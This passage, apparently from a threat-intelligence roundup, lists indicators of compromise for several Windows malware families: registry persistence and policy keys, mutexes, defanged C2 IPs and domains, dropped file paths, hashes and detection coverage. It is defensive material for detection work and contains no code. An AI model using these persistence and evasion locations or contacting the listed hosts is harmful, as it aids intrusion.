Does not indicate maliciousness | Occurrences \n---|--- \n`srv1300[.]ru` | 15 \n`srv1000[.]ru` | 15 \n`srv1100[.]ru` | 15 \n`srv1200[.]ru` | 15 \n`srv1400[.]ru` | 6 \nFiles and or directories created | Occurrences \n---|--- \n`\\autorun.inf` | 15 \n`\\Secret.exe` | 15 \n`\\Documents.exe` | 15 \n`\\Pictures.exe` | 15 \n`\\505050.exe` | 15 \n`\\Movies.exe` | 15 \n`\\Music.exe` | 15 \n`\\Private.exe` | 15 \n`\\windrv.exe` | 15 \n`E:\\autorun.inf` | 15 \n`E:\\Secret.exe` | 15 \n`E:\\505050.exe` | 15 \n`E:\\Documents.exe` | 15 \n`E:\\Movies.exe` | 15 \n`E:\\Music.exe` | 15 \n`E:\\Pictures.exe` | 15 \n`E:\\Private.exe` | 15 \n`E:\\windrv.exe` | 15 \n`%APPDATA%\\winmgr.txt` | 15 \n`D:\\autorun.inf` | 15 \n`%SystemRoot%\\M-5050402520507690204050` | 15 \n`%SystemRoot%\\M-5050402520507690204050\\winmgr.exe` | 15 \n \n#### File Hashes\n\n` 45dd665a06a9f87ec8ad562e6678a8384e0950bedba7beebba9c905157d1be52 4890d7aa8b302210932dacef3a0452ada7ee9c6565b1175f75925915e6036331 4ae81c49804d96d6913fc91ec79c77c0a16f09a5628cd9e6365bb621217ed3c9 5327d5502aa0e6cb6456809fc27cfcd1b0830a9cfd337d2a9493ec47a2eb6530 81489692294fa6e70b73f959a30a7bdd684141a72d3153b409f45173753acb82 8b66de0f1099ff243fbea1782c0ab7566bb9a201818d7793641e797c52067cab 8c03c0f22d09ba5384b804eced1c56e74f6c6df97d35a21f0d596dc2c80e5f5c 90b7e12af41916b8c82d0d83f6073e5bbc95f3c4ff1fd29391d50e7115967460 a0287b2bc66e1f6695d9c7e4ad6f70e8b1099f3f4b9761a4428e8ff02b173962 a80da89dfba6049d759500b272030ea7a97ab0d7cbe386456ddb65fa24b7f738 ce79b0e5a78be79315d2f20c6998812b75f4b95646d457034b4a534467e71558 d3da28644ddeaa70d828a659e27b83abcc284e578a62c26d1a4efc418cdac942 d6a90b5ff319cf5eb51d7b202c77e7e8037d2b160b80807e027ceb2e9834a29e d8797103159c7ebf48b8ff67033f61866b1e46f70f82a91ce33b8afe27f0252e e571c9202cd58870434c981bc0cf546473c446145d77362b1fdf7eb75f18400c `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A 
Threat Grid | 
Umbrella | N/A
Wsa | 

#### Screenshots of Detection

#### AMP

![AMP detection screenshot](<https://1.bp.blogspot.com/-4gCuLjJZARg/XU3M0QenW_I/AAAAAAAACSs/TQl5RkYJBtswmAhtQ723UfoeHGlhirINwCLcBGAs/s1600/45dd665a06a9f87ec8ad562e6678a8384e0950bedba7beebba9c905157d1be52_amp.png>)

#### ThreatGrid

![ThreatGrid detection screenshot](<https://1.bp.blogspot.com/-jqgxgbtThtU/XU3M6tGW1KI/AAAAAAAACSw/uyMy5CFE3E4Yeui93PYEdMj_7C8OQEzRgCLcBGAs/s1600/45dd665a06a9f87ec8ad562e6678a8384e0950bedba7beebba9c905157d1be52_tg.png>)

### Win.Malware.Zusy-7102354-1

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN`, Value Name: `F5DBF765` | 20

Mutexes | Occurrences
---|---
`F5DBF765` | 25
`\BaseNamedObjects\5145C9BD` | 11

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`216[.]218[.]185[.]162` | 23

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`ynefefyopqvu[.]com` | 17

Files and or directories created | Occurrences
---|---
`%APPDATA%\5145C9BD\bin.exe` | 23
`%HOMEPATH%\AppData\LocalLow\F5DBF765` | 22
`%APPDATA%\F5DBF765` | 21
`%APPDATA%\F5DBF765\bin.exe` | 20

#### File Hashes

```
03e74e58f2aed047d6bac9bde066206c64d3e48a4c865d86e29bc62edbb19c77
0eb478d5757cb872b80386250de948ac3abc76b5ebf0d7f2ab38f6a6ad95479c
0f779f8c2d4d342da2fc6bda22eb75bcc3939102ecea72847fafd9cbc10e26ad
1ed3291baf7d32ab690b56f430399d7c46d261176c5b05b3cf8f2cdd1f9a4681
2828b72f4856b8054ff75af987aa43d84f2d42405979c99e89e6082afc47d6da
2bcd2e02bf0cefed898990ae64791f9c294c50695542e2cf0e073c1f12dfed94
2bf93320c70c222aa89db3df81845d9277dc8eb7ff764b63f5ad4c5b78839557
2ecbe3620a6f08eadaf5c14aa35b2975b07ee41827f7004b692a7508b6a3c1a5
354d64a310cc3ce7a957c29f8654201ee0e79237609172e746aa25b5e038b837
3776eb64c25acfc28fd35fe6a123a0b4b1e0ee7e4ff2cde20169f1a914c01df1
39627480021a400069ee270b040601af19aaaf669bc6db2bf64058e14fb13875
3d0a697fec4326426bf22ae6b848700a3274c55767fb18a8e0748fc7f3024597
3e7ed99b45129a136287f785dffb67b044da28fd2232190fafc30c759c447a96
460de49bf98a472753462a9264bf40ea24b95fa667f3b8d7d010ca3fa94b715a
47e8ec99e3c0bb7526b381db1bec98b13df1deb95c56868703309bf4979155d2
48a0d3749139aebb4d435db7158aa1916e4d305139d3db168c795c68b9431ed6
4c46b50c94ad30df7661d5be4eaf3da8ed1f8f1924fa25f0b87f9e2bc5b21dc8
4cad121b0408001868b22b92d7def0a3125efe64ebd5d28bfbd933395fecf512
5ecd70109eec90c8ac0869398a4da72f9264ef5f3f61f2be883456ddd9bc6a32
62a2d6d129e578279b691542eea61040212cc4f26855beecd991118343d081cf
62afaeae9d1bc8473416423c46423951eb35cac6927798f6d9967a8fb358af2a
6b2d254b662c18e9a23fead0e661587c3f46b8fc8fac940fedb13e4e2b3d8bd6
6f3c9f7a94b4f3a3ecf29bcd646a55bb3d286ffd20b98fe2d984594dd73dbb5e
72683fb9644dbdc7d2fc1ba436d7f7379f2ce86fe3dac5431d29160abff07755
72c16952c7f016b6bbac0e1cc243aec6d9eacb1c1db8c3f744499584672580e5
```

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
Amp | 
Cloudlock | N/A
Cws | 
Email Security | 
Network Security | 
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | 
Wsa | 

#### Screenshots of Detection

#### AMP

![AMP detection screenshot](<https://1.bp.blogspot.com/-aD_k9wBvi7w/XU3OYgRNxzI/AAAAAAAACTE/3w3xcf2QATk_BEJh8RtyvkiiDtllPMsBgCLcBGAs/s1600/0f779f8c2d4d342da2fc6bda22eb75bcc3939102ecea72847fafd9cbc10e26ad_amp.png>)

#### ThreatGrid

![ThreatGrid detection screenshot](<https://1.bp.blogspot.com/-cpk0yyrdwN4/XU3OPhFRCgI/AAAAAAAACTA/rC6sU_cduvklwg5FVfCZE2U4ofFcwgt-gCEwYBhgL/s1600/0f779f8c2d4d342da2fc6bda22eb75bcc3939102ecea72847fafd9cbc10e26ad_tg.png>)

#### Umbrella

![Umbrella detection screenshot](<https://1.bp.blogspot.com/-0irmTmU9_zU/XU3PF6lOpfI/AAAAAAAACTQ/2MVcL7sl9Gc2HccPLyTh_K3HnilzUwjRgCLcBGAs/s1600/03e74e58f2aed047d6bac9bde066206c64d3e48a4c865d86e29bc62edbb19c77_umbrella.png>)

### Win.Worm.Brontok-7102096-1

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKCU>\CONTROL PANEL\DESKTOP`, Value Name: `ScreenSaverIsSecure` | 25
`<HKCU>\CONTROL PANEL\DESKTOP`, Value Name: `ScreenSaveTimeOut` | 25
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER`, Value Name: `NoTrayContextMenu` | 25
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CABINETSTATE`, Value Name: `FullPathAddress` | 25
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED`, Value Name: `HideFileExt` | 25
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED`, Value Name: `Hidden` | 25
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER`, Value Name: `NoViewContextMenu` | 25
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM`, Value Name: `DisableRegistryTools` | 25
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER`, Value Name: `DisallowRun` | 25
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER`, Value Name: `NoTrayItemsDisplay` | 25
`<HKCU>\CONTROL PANEL\DESKTOP`, Value Name: `SCRNSAVE.EXE` | 25
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN`, Value Name: `nEwb0Rn` | 25
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN`, Value Name: `n3wb012nAdministrator` | 25
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN`, Value Name: `n210bw3n` | 25
`<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT`, Value Name: `AlternateShell` | 25
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON`, Value Name: `Shell` | 25
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON`, Value Name: `Userinit` | 25
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\AEDEBUG`, Value Name: `Debugger` | 25
`<HKLM>\SOFTWARE\CLASSES\LNKFILE\SHELL\OPEN\COMMAND` | 25
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION`, Value Name: `RegisteredOrganization` | 25
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION`, Value Name: `RegisteredOwner` | 25
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER`, Value Name: `NoFileAssociate` | 25
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER`, Value Name: `NoFileAssociate` | 25
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER`, Value Name: `DisallowRun` | 25
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\DISALLOWRUN`, Value Name: `1` | 25

Mutexes | Occurrences
---|---
`Local\MSCTF.Asm.MutexWinlogon2` | 25
`Local\MSCTF.CtfMonitorInstMutexWinlogon2` | 25

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`51[.]141[.]32[.]51` | 24

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`time[.]microsoft[.]akadns[.]net` | 24

Files and or directories created | Occurrences
---|---
`%System32%\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx` | 25
`%HOMEPATH%\Local Settings\Application Data\winlogon.exe` | 24
`%SystemRoot%\nEwb0Rn.exe` | 22
`%System32%\DamageControl.scr` | 22
`%System32%\JawsOfLife.exe` | 22
`\nEwb0Rn.exe` | 22
`\Documents and Settings\All Users\Start Menu\Programs\Startup\Empty.pif` | 21
`%HOMEPATH%\Local Settings\Application Data\WINDOWS\CSRSS.EXE` | 21
`%HOMEPATH%\Local Settings\Application Data\WINDOWS\LSASS.EXE` | 21
`%HOMEPATH%\Local Settings\Application Data\WINDOWS\SERVICES.EXE` | 21
`%HOMEPATH%\Local Settings\Application Data\WINDOWS\SMSS.EXE` | 21
`%HOMEPATH%\Local Settings\Application Data\WINDOWS\WINLOGON.EXE` | 21
`%System32%\WishfulThinking.exe` | 21
`\about.htm` | 18
`%ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif` | 2
`%SystemRoot%\msvbvm60.dll` | 2
`E:\Download Administrator.exe` | 2
`E:\MP3[NEW-RELEASE].exe` | 2
`E:\nEwb0Rn\New Folder.exe` | 2
`\Download Administrator.exe` | 2
`\Friendster Blog.exe` | 2
`\MP3[NEW-RELEASE].exe` | 2
`\Mini Games.exe` | 2
`\StyleXP-WindowsVistaPack.exe` | 2
`%LOCALAPPDATA%\WINDOWS\CSRSS.EXE` | 2

*See JSON for more IOCs

#### File Hashes

```
642e0acdbece0f1e99604f63488e2d0ae4845080adba80ecfc55cbc95db05bc5
73fcbb6f10cd849bff109dd05cf89d9b612302faed9c382791d6df4d024bc009
7e98f0308fd88e97e4f80b1e2c6845e18186e07d2a27d936bccadad719114334
809f403efb1c7f19a30cfdd62841b898ebfbc1e91626928bb372ad630d8d9b81
81dc5726d4af65258dec6ccf0dda1327fcacb9b950539992fff82859c6645a27
85506de211f0441c3bbf0e98668a7d3d1c2a62aadc07ef82968245644fca4b00
8ef7ee2b458b006e3364f972a744031cb99c9a9d7bb4329b4a41e6d0e1cbb784
96093b99c83298eeb0aa6ac9a9c006f23ad8d8c1818b8a88c62ea1f88fd7d368
9784b14130ecabb2d53ea4226e79f6dca68e9bf31a83cc447a0113464582a5df
99da8c945884ce7e214aba8f0b363532082d660bae2693c098b230701d236b7b
9b4eabfb075dd32ce295b7dab5a0347f7c5f89021c8804cf88152b0be7de1544
9bf0202ddec81f84ad07867e28214decfef7fd5bd1327a6b9482de823d90ff60
9da800449b88fbc076c16d4fa6d42645367e9b0e1c3306ad5f65df77b3348a72
9de658e0f67bdcae688d74907763d87f280086e5c47cc0c2ee545f8cf675a42d
a2cbadc9bb11b4174d11407599ae95ee3680054e04105b0ef435628dcc252954
a84944ae92cc5732281c71ffa5b17b68ee362441bc8093da4d59bc0ca5723f74
a86c3e90ba9c53348dde346e5bebf63d8198dafabf82baaf298f5b8c23ff4fa8
b36b7ceef1d16e877580931a8ec5a70462f0513a4d113bcb1e3e198830aa3447
c600cf8b855fefb4e9e1e4d0c1f0d92c58eee1f06d53a88b0d96ecac94e7dbfd
c88906c44642322a0ad3fd0207e9873d89d16d15b317c0e51d1fed28138ce210
cba998582b123d210bccb81e49db805736439eba5f4735883d4597e2c5895f85
d296651dfc3d2d3f31115e48e815449bf71d06a64318462c1bd2f0e299d6a63f
d38e3cfe3f57ddea4f4b8966b4b51812af1ac688849a8bbee086ec905f0406d1
d3a23ff88633039f39ea421a2d197e3b6d9bb26ad6e5500dfb559b126884fbac
d5456a558e240fbe2e116155e4a04c8c038550ab4c2c4103d9e49da2a8ba495f
```

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
Amp | 
Cloudlock | N/A
Cws | 
Email Security | 
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | N/A
Wsa | N/A

#### Screenshots of Detection

#### AMP

![AMP detection screenshot](<https://1.bp.blogspot.com/-6ZWdcT_r_4k/XU3PWRqgACI/AAAAAAAACTY/Npr3WJrX8Lcl15wk-WT7x1jPZroJ3YqygCLcBGAs/s1600/642e0acdbece0f1e99604f63488e2d0ae4845080adba80ecfc55cbc95db05bc5_amp.png>)

#### ThreatGrid

![ThreatGrid detection screenshot](<https://1.bp.blogspot.com/-pl-WqHJO3Ys/XU3PaLukIuI/AAAAAAAACTc/ivffFBlFSQIRzQt5PrLMGVfYC8jBWiPVQCLcBGAs/s1600/642e0acdbece0f1e99604f63488e2d0ae4845080adba80ecfc55cbc95db05bc5_tg.png>)

### Win.Worm.Socks-7102087-0

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN`, Value Name: `ntuser` | 11
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN`, Value Name: `autoload` | 11
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SCHEDULE`, Value Name: `ImagePath` | 11
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN`, Value Name: `ntuser` | 11
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN`, Value Name: `autoload` | 11

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`208[.]100[.]26[.]251` | 11
`23[.]20[.]239[.]12` | 11
`104[.]25[.]37[.]108` | 8
`104[.]25[.]38[.]108` | 3

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`www[.]hugedomains[.]com` | 11
`fewfwe[.]com` | 11
`fewfwe[.]net` | 11
`static[.]HugeDomains[.]com` | 7

Files and or directories created | Occurrences
---|---
`%HOMEPATH%\cftmon.exe` | 11
`%SystemRoot%\SysWOW64\drivers\spools.exe` | 11

#### File Hashes

```
16c60b7975280008e5491cae5e71fa48671be5c97010488faf63956c6552c628
44f3b28713682be10e02bdf52a99290b733931bac2e8c0b4102e4f458b1284bd
5943ca2e22ce53fcc9b7caabfca8d8cf721ccbd4f536833b10a370303fcaf505
7e9b3d25d766a1ff8520187b8f49387b1f654778ba58838e37e0ff741ab10f73
8dfb856841b2f70e2bffb74f26225dcc42d65d3fa6250767397ac30bf21823f5
a52c2e6216c1685d35385419c9c8cd854ea70490f923bbc3eaff92df26bafbc6
a73604e5b2456cc803dae1b79d91db32ce2535562bdc73eb762394540c79d7af
b9510728d8c9d3807e26ba9286f3ab6890e335a197b377201b939230a3d6d69b
c8a3ac87c01529800bd6461d94702428322c7a3aed93ed676f0a55d3d56addd9
e4c7f241397b5a46c3081214f1eb67b51bd6d5dd20cd984db4f5ac164f260bf1
fe80f9c59fc294d3a6fe8d973ea687f92daf1a6988e13a26bcec20f34f44ab25
```

#### Coverage

Product | Protection
---|---
Amp | 
Cloudlock | N/A
Cws | 
Email Security | 
Network Security | 
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | N/A
Wsa | 

#### Screenshots of Detection

#### AMP

![AMP detection screenshot](<https://1.bp.blogspot.com/-ZHnATHYXbBo/XU3PsCQ8GnI/AAAAAAAACTw/C0tZjMLq7zQu-pw45c3wuZxIa_DJJlf-QCEwYBhgL/s1600/7e9b3d25d766a1ff8520187b8f49387b1f654778ba58838e37e0ff741ab10f73_amp.png>)

#### ThreatGrid

![ThreatGrid detection screenshot](<https://1.bp.blogspot.com/-U_ICUIL9cmQ/XU3P66OFj2I/AAAAAAAACT0/h7jOKg0cCk0X2MbaEILOX8wF4sD5VafcQCEwYBhgL/s1600/7e9b3d25d766a1ff8520187b8f49387b1f654778ba58838e37e0ff741ab10f73_tg.png>)

### Win.Malware.Formbook-7102043-1

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE`, Value Name: `Registry Key Name` | 11
`<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\INTELLIFORMS\STORAGE2` | 8
`<HKLM>\SOFTWARE\WOW6432NODE\MOZILLA\MOZILLA FIREFOX` | 8
`<HKLM>\SOFTWARE\WOW6432NODE\MOZILLA\MOZILLA FIREFOX\20.0.1 (EN-US)\MAIN` | 8
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\9375CFF0413111D3B88A00104B2A6676` | 8
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\9375CFF0413111D3B88A00104B2A6676\00000001` | 8
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\9375CFF0413111D3B88A00104B2A6676\00000002` | 8
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\9375CFF0413111D3B88A00104B2A6676\00000003` | 8
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK` | 8
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\0A0D020000000000C000000000000046` | 8
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\13DBB0C8AA05101A9BB000AA002FC45A` | 8
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\33FD244257221B4AA4A1D9E6CACF8474` | 8
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\3517490D76624C419A828607E2A54604` | 8
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\4C8F4917D8AB2943A2B2D4227B0585BF` | 8
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\5309EDC19DC6C14CBAD5BA06BDBDABD9` | 8
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\82FA2A40D311B5469A626349C16CE09B` | 8
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\8503020000000000C000000000000046` | 8
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\9207F3E0A3B11019908B08002B2A56C2` | 8
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\9E71065376EE7F459F30EA2534981B83` | 8
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\A88F7DCF2E30234E8288283D75A65EFB` | 8
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\C02EBC5353D9CD11975200AA004AE40E` | 8
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\D33FC3B19A738142B2FC0C56BD56AD8C` | 8
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\DDB0922FC50B8D42BE5A821EDE840761` | 8
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\DF18513432D1694F96E6423201804111` | 8
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\ECD15244C3E90A4FBD0588A41AB27C55` | 8

Mutexes | Occurrences
---|---
`8-3503835SZBFHHZ` | 11
`551NC37UWE1041Fz` | 11

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`213[.]171[.]195[.]105` | 2
`213[.]186[.]33[.]5` | 1
`74[.]220[.]215[.]74` | 1
`154[.]91[.]238[.]82` | 1
`208[.]91[.]197[.]39` | 1
`47[.]91[.]169[.]15` | 1
`103[.]251[.]238[.]111` | 1
`185[.]218[.]125[.]67` | 1

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`www[.]aamyz87[.]info` | 3
`www[.]ingenuity[.]degree` | 2
`www[.]activeliberal[.]win` | 2
`www[.]beautagram[.]com` | 2
`gmpg[.]org` | 1
`www[.]cyqunli[.]com` | 1
`WWW[.]SOJAH[.]STORE` | 1
`www[.]qhdljj[.]com` | 1
`www[.]tzhmc[.]net` | 1
`www[.]yourbostonrefinance[.]com` | 1
`www[.]immersive-journey[.]com` | 1
`www[.]studiodennis[.]com` | 1
`www[.]wanggh[.]com` | 1
`www[.]americatourbus[.]info` | 1
`www[.]kalayab[.]download` | 1
`www[.]shaoerjia[.]com` | 1
`www[.]maybrooktaxiandlimo[.]info` | 1
`www[.]tipshots[.]com` | 1

Files and or directories created | Occurrences
---|---
`%TEMP%\subfolder` | 11
`%TEMP%\subfolder\filename.exe` | 11
`%TEMP%\subfolder\filename.vbs` | 11
`%APPDATA%\551NC37U` | 8
`%APPDATA%\551NC37U\551log.ini` | 8
`%APPDATA%\551NC37U\551logrc.ini` | 8
`%APPDATA%\551NC37U\551logri.ini` | 8
`%APPDATA%\551NC37U\551logrv.ini` | 8
`%APPDATA%\551NC37U\551logim.jpeg` | 7
`%ProgramFiles(x86)%\Amb80q` | 1
`%ProgramFiles(x86)%\Amb80q\serviceslds.exe` | 1
`%TEMP%\Amb80q` | 1
`%TEMP%\Amb80q\serviceslds.exe` | 1

#### File Hashes

```
0d9c018014931c251ac8bf951a99fcb974673e895f27e62fa6ead981b2d7b4a2
152f38878f5a8b19fef76f086f60f9a350bacfb55ced80cdbceb200b88e9c9fa
2908ff55a23aa61c2393df98cd6847f60343f296aeeb7bcc60c510701dcbf84f
2b6f4aad989ddca53c3cb56bbddb52e8577cbb40939f97ef9c7efb60d24a39ae
2c82db5284c54272e4ba7ac3523ffccf496d1584fd99444c0eaa225773e29721
6fc83ce9acf100506d039461642290e798f46baaf8034b5f2ead098edc3d9f4c
78663a1055ddd96e74b633b43128c83378787b52f031194ebaeccf69a0222645
c1b420d09459d96aa0bbc12a6b010a6d12b5910ffbd0289fa7a3ed3aebfac40d
d27385d640966750e4ead578539a36a62ba0ae5c9083f03865927ef5deac2d8f
d7bb858da997925668b1f85b83ba9f01b381a16de1ee6c37d003658cb98c4990
e4baf530d129b0a3a87e5de09ce86efc7c6c532ec91ade78c934d5e8d818938e
```

#### Coverage

Product | Protection
---|---
Amp | 
Cloudlock | N/A
Cws | 
Email Security | 
Network Security | 
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | N/A
Wsa | 

#### Screenshots of Detection

#### AMP

![AMP detection screenshot](<https://1.bp.blogspot.com/-T4Xc5XxJ2PY/XU3QmQJpPJI/AAAAAAAACT8/33Yc9frC4pwvaz88aJ6B3XoWNWbA4AqUwCLcBGAs/s1600/2c82db5284c54272e4ba7ac3523ffccf496d1584fd99444c0eaa225773e29721_amp.png>)

#### ThreatGrid

![ThreatGrid detection screenshot](<https://1.bp.blogspot.com/-IAWh8SPAAL4/XU3Qp2jP04I/AAAAAAAACUA/Cib5bh0DuU4Nu1e3kJm418FBFHAyrPSogCLcBGAs/s1600/2c82db5284c54272e4ba7ac3523ffccf496d1584fd99444c0eaa225773e29721_tg.png>)

### Win.Malware.Tofsee-7101989-1

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKU>\.DEFAULT\CONTROL PANEL\BUSES` | 15
`<HKU>\.DEFAULT\CONTROL PANEL\BUSES`, Value Name: `Config1` | 15
`<HKU>\.DEFAULT\CONTROL PANEL\BUSES`, Value Name: `Config2` | 15
`<HKU>\.DEFAULT\CONTROL PANEL\BUSES`, Value Name: `Config0` | 15
`<HKU>\.DEFAULT\CONTROL PANEL\BUSES`, Value Name: `Config3` | 15
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>` | 15
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>`, Value Name: `Type` | 15
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>`, Value Name: `Start` | 15
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>`, Value Name: `ErrorControl` | 15
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>`, Value Name: `DisplayName` | 15
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>`, Value Name: `WOW64` | 15
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>`, Value Name: `ObjectName` | 15
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>`, Value Name: `Description` | 15
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>`, Value Name: `ImagePath` | 12
`<HKU>\.DEFAULT\CONTROL PANEL\BUSES`, Value Name: `Config4` | 4
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS`, Value Name: `C:\Windows\SysWOW64\wpdjiqwl` | 2
